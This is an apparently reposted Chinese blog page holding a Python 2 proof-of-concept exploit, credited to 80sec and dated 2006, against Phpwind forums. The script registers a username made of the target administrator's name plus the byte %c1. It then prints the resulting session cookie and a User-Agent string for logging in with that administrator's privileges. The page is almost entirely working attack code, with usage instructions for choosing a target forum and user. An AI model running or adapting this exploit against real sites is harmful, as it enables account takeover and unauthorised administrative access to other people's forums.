phpwind管理权限泄露漏洞利用程序

本文提供了一个针对Phpwind所有版本中管理权限泄露漏洞的POC代码,演示了如何利用该漏洞创建与目标管理员相同的账户。介绍了使用方法及攻击结果。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

导读:
  2. import urllib2,httplib,sys
  3. httplib.HTTPConnection.debuglevel = 1
  4. cookies = urllib2.HTTPCookieProcessor()
  5. opener = urllib2.build_opener(cookies)
  6.
  7.
  8. def banner():
  9. print ""
  10. print "########################################################"
  11. print "Phpwind所有版本管理权限泄露漏洞利用poc"
  12. print "Copyright (C) 2006"
  13. print "jianxin@80sec.com"
  14. print "80sec是一个新的致力于web安全的小团体"
  15. print "http://www.80sec.com"
  16.
  17. def usage():
  18. banner()
  19. print "Usage:/n"
  20. print "$ ./phpwind.py pwforumurl usertoattack/n"
  21. print "pwforumurl 目标论坛地址如http://www.80sec.com/"
  22. print "usertoattack 目标拥有权限的斑竹或管理员"
  23. print "攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
  24. print "最新版本可以使用uid登陆"
  25. print "其他版本可以使用cookie+useragent登陆"
  26. print "########################################################"
  27. print ""
  28.
  29.
  30. argvs=sys.argv
  31. usage()
  32.
  33.
  34. data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@80sec®email=foo@foo.com®emailtoall=1&step=2" % (argvs[2],"%c1")
  35. pwurl = "%s/register.php" % argvs[1]
  36.
  37. request = urllib2.Request(
  38. url = pwurl ,
  39. headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},
  40. data = data)
  41.
  42. f=opener.open(request)
  43. headers=f.headers.dict
  44. cookie=headers["set-cookie"]
  45. try:
  46. if cookie.index('winduser'):
  47. print "Exploit Success!"
  48. print "Login with uid password @80sec or Cookie:"
  49. print cookie
  50. print "User-agent: 80sec owned this"
  51. except:
  52. print "Error! http://www.80sec.com"
  53. print "Connect root#80sec.com"

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值